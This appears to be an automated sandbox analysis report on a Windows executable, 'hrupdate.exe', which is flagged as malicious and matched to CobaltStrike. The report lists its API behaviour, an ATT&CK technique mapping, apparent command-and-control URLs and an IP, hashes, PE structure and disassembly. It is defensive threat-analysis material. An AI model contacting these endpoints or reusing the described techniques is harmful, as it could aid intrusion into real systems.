Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_04699839 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_04699839
Source: hrupdate.exe, 00000000.00000003.3567988184.0000000002DDA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1-
Source: hrupdate.exe, 00000000.00000002.3897221347.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567988184.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867908182.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3896833882.0000000000B8B000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588982597.0000000002DC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: hrupdate.exe, 00000000.00000002.3896833882.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-18161
Source: C:\Users\user\Desktop\hrupdate.exeAPI call chain: ExitProcess graph end nodegraph_0-18531
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046AE81B LdrInitializeThunk,0_2_046AE81B
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0067364F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067364F
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046BFCF7 LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,FreeLibrary,0_2_046BFCF7
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3BE95 mov eax, dword ptr fs:[00000030h]0_3_00F3BE95
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_3_00F3CA68 mov eax, dword ptr fs:[00000030h]0_3_00F3CA68
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046BFE9D VirtualQuery,GetModuleFileNameW,GetPdbDll,GetProcAddress,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,0_2_046BFE9D
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0067364F IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0067364F
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00673084 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00673084
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_006737E2 SetUnhandledExceptionFilter,0_2_006737E2
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046B2CCF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_046B2CCF
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046B655E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_046B655E
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A43CB LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_046A43CB
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A459B GetCurrentProcessId,AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_046A459B
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0067390E cpuid 0_2_0067390E
Source: C:\Users\user\Desktop\hrupdate.exeCode function: GetLocaleInfoA,0_2_046BC0B0
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046988A5 CreateNamedPipeA,0_2_046988A5
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0067353E GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0067353E
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_00671480 WSAStartup,GetUserNameW,wcstombs_s,memset,strncat,WSACleanup,LoadStringW,LoadStringW,LoadStringW,LoadIconW,LoadIconW,LoadCursorW,LoadIconW,RegisterClassExW,CreateWindowExW,UpdateWindow,LoadIconW,lstrcpyW,Shell_NotifyIconW,LoadAcceleratorsW,GetMessageW,GetMessageW,DialogBoxParamW,TranslateAcceleratorW,TranslateMessage,DispatchMessageW,GetMessageW,terminate,0_2_00671480
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469CCA3 GetUserNameA,GetComputerNameA,GetModuleFileNameA,_strrchr,GetVersionExA,__snprintf,0_2_0469CCA3
Source: C:\Users\user\Desktop\hrupdate.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Remote Access Functionality

barindex
Yara detected CobaltStrike
Source: Yara matchFile source: 00000000.00000002.3897221347.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.3290133127.0000000000F30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000003.3290059419.0000000000BB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000000.00000002.3897384147.0000000004694000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: hrupdate.exe PID: 6664, type: MEMORYSTR
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469D481 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_0469D481
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_046A4FA4 socket,closesocket,htons,bind,listen,0_2_046A4FA4
Source: C:\Users\user\Desktop\hrupdate.exeCode function: 0_2_0469D39F socket,htons,ioctlsocket,closesocket,bind,listen,0_2_0469D39F

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure2
Valid Accounts		2
Command and Scripting Interpreter		2
Valid Accounts		2
Valid Accounts		2
Valid Accounts		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
Native API		1
DLL Side-Loading		21
Access Token Manipulation		1
Virtualization/Sandbox Evasion		LSASS Memory131
Security Software Discovery		Remote Desktop ProtocolData from Removable Media4
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Process Injection		21
Access Token Manipulation		Security Account Manager1
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
DLL Side-Loading		1
Process Injection		NTDS1
Process Discovery		Distributed Component Object ModelInput Capture114
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Account Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials1
System Owner/User Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
File and Directory Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem24
System Information Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
hrupdate.exe3%ReversingLabs
hrupdate.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
ec2-3-79-209-76.eu-central-1.compute.amazonaws.com
3.79.209.76
truetrue
    		unknown
    www.hrtraining.ro
    		unknown
    		unknowntrue
      		unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://www.flntp.ro/rss/portallogin-gettask.htmltrue
        		unknown
        www.hrtraining.rotrue
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://www.hrtraining.ro/KSSMhrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
            		unknown
            https://www.hrtraining.ro/Phrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
              		unknown
              http://www.hrtraining.ro/trainingcheck_v5498dummyhttp://www.hrtraining.ro/trakingu/invalidhrupdate.exefalse
                		unknown
                https://www.hrtraining.rhrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                  		unknown
                  https://www.hrtraining.ro/hrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567988184.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3867908182.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588982597.0000000002DC2000.00000004.00000800.00020000.00000000.sdmpfalse
                    		unknown
                    https://www.hrtraining.ro/rss/portallogin-gettask.htmlhrupdate.exe, 00000000.00000003.3867855312.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                      		unknown
                      http://www.hrtraining.ro/trakingu/hrupdate.exefalse
                        		unknown
                        http://www.hrtraining.ro/trakingu/useruserhrupdate.exe, 00000000.00000002.3896775640.0000000000AFB000.00000004.00000010.00020000.00000000.sdmpfalse
                          		unknown
                          https://www.hrtraining.ro/rss/portallogin-gettask.htmlNhrupdate.exe, 00000000.00000003.3867908182.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000002.3897221347.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                            		unknown
                            http://www.hrtraining.ro/trainingcheck_v5498bhrupdate.exe, 00000000.00000002.3897320624.00000000044FC000.00000004.00000010.00020000.00000000.sdmpfalse
                              		unknown
                              http://www.hrtraining.ro/trainingcheck_v5498hrupdate.exefalse
                                		unknown
                                http://www.hrtraining.ro/trakingu/userhrupdate.exe, 00000000.00000002.3896775640.0000000000AFB000.00000004.00000010.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://www.hrtraining.ro/rss/portallogin-gettask.htmlxLhrupdate.exe, 00000000.00000002.3896833882.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3567852375.0000000000BBC000.00000004.00000020.00020000.00000000.sdmp, hrupdate.exe, 00000000.00000003.3588932882.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    3.79.209.76
                                    		ec2-3-79-209-76.eu-central-1.compute.amazonaws.comUnited States
                                    		16509AMAZON-02UStrue

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1578569
                                    Start date and time:2024-12-19 22:44:49 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 5m 49s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Run name:Run with higher sleep bypass
                                    Number of analysed new started processes analysed:4
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:hrupdate.exe
                                    Detection:MAL
                                    Classification:mal96.troj.evad.winEXE@1/0@2/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 93%
                                    • Number of executed functions: 32
                                    • Number of non-executed functions: 103
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: hrupdate.exe

                                    Simulations

                                    Behavior and APIs

                                    No simulations

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AMAZON-02UShttps://www.canva.com/design/DAGZxEJMIA0/pFi0b1a1Y78oAGDuII8Hjg/view?utm_content=DAGZxEJMIA0&utm_campaign=designshare&utm_medium=link2&utm_source=uniquelinks&utlId=hdcdec8ed4aGet hashmaliciousHTMLPhisherBrowse
                                    • 75.2.57.54
                                    https://gateway.lighthouse.storage/ipfs/bafkreigjxudfsi54f5pliswxztgujxgpdhe4uyrezdbg5avbtrclxrxc6iGet hashmaliciousHTMLPhisherBrowse
                                    • 13.227.8.71
                                    https://launch.app/prolandtitleGet hashmaliciousHTMLPhisherBrowse
                                    • 76.76.21.21
                                    Employee_Letter.PDFuJPefyDW1j.urlGet hashmaliciousUnknownBrowse
                                    • 13.227.8.47
                                    mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 3.165.3.192
                                    6CWcISKhf1.msiGet hashmaliciousAteraAgentBrowse
                                    • 13.232.67.198
                                    https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ==Get hashmaliciousHTMLPhisherBrowse
                                    • 13.227.8.65
                                    spc.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 18.217.199.157
                                    x86_64.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 65.3.229.89

                                    JA3 Fingerprints

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    37f463bf4616ecd445d4a1937da06e19billys.exeGet hashmaliciousMeduza StealerBrowse
                                    • 3.79.209.76
                                    ruppert.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                    • 3.79.209.76
                                    file.exeGet hashmaliciousScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, VidarBrowse
                                    • 3.79.209.76
                                    2JSGOlbNym.dllGet hashmaliciousUnknownBrowse
                                    • 3.79.209.76
                                    4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                    • 3.79.209.76
                                    QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                    • 3.79.209.76
                                    PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 3.79.209.76
                                    PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                    • 3.79.209.76
                                    INVOICE-0098.pdf ... .lnk.lnk.d.lnkGet hashmaliciousUnknownBrowse
                                    • 3.79.209.76

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    No created / dropped files found

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):4.407559158089781
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:hrupdate.exe
                                    File size:244'224 bytes
                                    MD5:03b14e9338a1c9e5551f9450207f6d84
                                    SHA1:f1a816c47637c8d4d0b52b333cba11b0d7571fcb
                                    SHA256:7a4d2b3e83220df7a55944a838bb9ebaa8f8463cff62fa92ae10e640eeb4e498
                                    SHA512:2c51fc5272e24ef43d770c7a6ac30252bcd408878405d2f1cf63327a05e497fd6e5fabc54a328ece7c4abe2ee4b1fcd8e9c03cb03bd6d5f0b2d7d6c87848b946
                                    SSDEEP:1536:MUth9KcBb/v5D8gCHqoPXDO4YcPJnWQyz9999Uh:MUtXNVD8gCPD3L
                                    TLSH:0C343B43569D7C92CC3C1B38237B97DB832EBE7578C5E08EB9803E9692BD0923512795
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<...].V.].V.].V.%$V.].V.5.W.].V.5.W.].V.5.W.].V.5.W.].V...W.].V.].V:].V$4.W.].V$4HV.].V.] V.].V$4.W.].VRich.].V........PE..L..

                                    File Icon

                                    Icon Hash:17170f6d2b2d2d13

                                    Static PE Info

                                    General

                                    Entrypoint:0x40307a
                                    Entrypoint Section:.text
                                    Digitally signed:false
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x672B2266 [Wed Nov 6 08:01:42 2024 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:6
                                    OS Version Minor:0
                                    File Version Major:6
                                    File Version Minor:0
                                    Subsystem Version Major:6
                                    Subsystem Version Minor:0
                                    Import Hash:40fa9cd20812bab5129ef85091bfbdac

                                    Entrypoint Preview

                                    Instruction
                                    call 00007F1F1D259D41h
                                    jmp 00007F1F1D2596AFh
                                    push ebp
                                    mov ebp, esp
                                    push 00000000h
                                    call dword ptr [00404038h]
                                    push dword ptr [ebp+08h]
                                    call dword ptr [0040406Ch]
                                    push C0000409h
                                    call dword ptr [00404034h]
                                    push eax
                                    call dword ptr [0040403Ch]
                                    pop ebp
                                    ret
                                    push ebp
                                    mov ebp, esp
                                    sub esp, 00000324h
                                    push 00000017h
                                    call 00007F1F1D25A2EAh
                                    test eax, eax
                                    je 00007F1F1D259837h
                                    push 00000002h
                                    pop ecx
                                    int 29h
                                    mov dword ptr [00406330h], eax
                                    mov dword ptr [0040632Ch], ecx
                                    mov dword ptr [00406328h], edx
                                    mov dword ptr [00406324h], ebx
                                    mov dword ptr [00406320h], esi
                                    mov dword ptr [0040631Ch], edi
                                    mov word ptr [00406348h], ss
                                    mov word ptr [0040633Ch], cs
                                    mov word ptr [00406318h], ds
                                    mov word ptr [00406314h], es
                                    mov word ptr [00406310h], fs
                                    mov word ptr [0040630Ch], gs
                                    pushfd
                                    pop dword ptr [00406340h]
                                    mov eax, dword ptr [ebp+00h]
                                    mov dword ptr [00406334h], eax
                                    mov eax, dword ptr [ebp+04h]
                                    mov dword ptr [00406338h], eax
                                    lea eax, dword ptr [ebp+08h]
                                    mov dword ptr [00406344h], eax
                                    mov eax, dword ptr [ebp-00000324h]
                                    mov dword ptr [00406280h], 00010001h

                                    Rich Headers

                                    Programming Language:
                                    • [IMP] VS2008 SP1 build 30729

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x4d0c0x140.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x70000x361b8.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3e0000x400.reloc
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x44500x70.rdata
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x44c00x40.rdata
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x40000x230.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x2ecb0x30005d06f4206746907c833a2481f65088c1False0.5750325520833334COM executable for DOS6.300274659901053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x40000x1a080x1c001e97f3d49e555f25c36fe5d37cfead01False0.39620535714285715data4.65454105213308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0x60000x7380x4002ceacc7ad5a855df52932a54a33adc4dFalse0.259765625data3.3218316032948274IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x70000x361b80x3620074bdbba1f539597c017848daa85523b5False0.14270893475750576data4.0626831582612635IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x3e0000x4000x400b6b1b20025ba3ae165aea709cabb8ef5False0.912109375data6.464420599581639IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_BITMAP0x1e1700x1ed70Device independent bitmap graphic, 205 x 205 x 24, image size 126280, resolution 2835 x 2835 px/mEnglishUnited States0.1544094363521216
                                    RT_ICON0x75e00x115aPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.33340837460603334
                                    RT_ICON0x87400xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.09408315565031983
                                    RT_ICON0x95e80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11507220216606498
                                    RT_ICON0x9e900x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.12427745664739884
                                    RT_ICON0xa3f80x90bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.791792656587473
                                    RT_ICON0xad080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.03235710911667454
                                    RT_ICON0xef300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.04595435684647303
                                    RT_ICON0x114d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.075046904315197
                                    RT_ICON0x125800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.15070921985815602
                                    RT_ICON0x12a700x115aPNG image data, 256 x 256, 8-bit colormap, non-interlacedEnglishUnited States0.33340837460603334
                                    RT_ICON0x13bd00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.09408315565031983
                                    RT_ICON0x14a780x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.11507220216606498
                                    RT_ICON0x153200x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.12427745664739884
                                    RT_ICON0x158880x90bPNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.791792656587473
                                    RT_ICON0x161980x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.03235710911667454
                                    RT_ICON0x1a3c00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.04595435684647303
                                    RT_ICON0x1c9680x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.075046904315197
                                    RT_ICON0x1da100x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.15070921985815602
                                    RT_MENU0x1df000x4adataEnglishUnited States0.8648648648648649
                                    RT_DIALOG0x1df600x100dataEnglishUnited States0.62890625
                                    RT_DIALOG0x1e0600x10cdataEnglishUnited States0.6492537313432836
                                    RT_STRING0x3cee00x50dataEnglishUnited States0.75
                                    RT_ACCELERATOR0x1df500x10dataEnglishUnited States1.25
                                    RT_GROUP_ICON0x129e80x84dataEnglishUnited States0.6590909090909091
                                    RT_GROUP_ICON0x1de780x84dataEnglishUnited States0.6515151515151515
                                    RT_MANIFEST0x3cf300x286XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5479876160990712

                                    Imports

                                    DLLImport
                                    KERNEL32.dllFlsSetValue, CreateFileA, CloseHandle, K32GetModuleInformation, GetModuleHandleA, GetConsoleWindow, lstrcpyW, CreateFileMappingW, MapViewOfFile, GetCurrentProcess, SetUnhandledExceptionFilter, TerminateProcess, FreeLibrary, VirtualAlloc, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, UnhandledExceptionFilter, FlsAlloc, VirtualProtect
                                    USER32.dllShowWindow, LoadStringW, RegisterClassExW, GetMessageW, DefWindowProcW, DestroyWindow, CreateWindowExW, SendMessageW, EndDialog, DispatchMessageW, EndPaint, BeginPaint, SetTimer, TranslateAcceleratorW, TranslateMessage, LoadIconW, LoadCursorW, GetDlgItem, UpdateWindow, KillTimer, PostQuitMessage, DialogBoxParamW, LoadAcceleratorsW
                                    ADVAPI32.dllGetUserNameW
                                    SHELL32.dllShell_NotifyIconW
                                    MSVCP140.dll_Mtx_destroy, _Mtx_unlock, _Cnd_init, _Query_perf_frequency, _Xtime_get_ticks, _Thrd_detach, _Query_perf_counter, _Thrd_start, _Mtx_init, _Cnd_wait, _Thrd_sleep, _Cnd_destroy, _Cnd_signal, _Cnd_do_broadcast_at_thread_exit, ?_Throw_Cpp_error@std@@YAXH@Z, ?_Xout_of_range@std@@YAXPBD@Z, ?_Xbad_function_call@std@@YAXXZ, ?_Throw_C_error@std@@YAXH@Z, ?_Xlength_error@std@@YAXPBD@Z, _Mtx_lock
                                    WS2_32.dllWSACleanup, recv, htons, gethostbyname, WSAStartup, inet_addr, gethostbyaddr, send, socket, connect, closesocket
                                    CRYPT32.dllCertEnumSystemStore
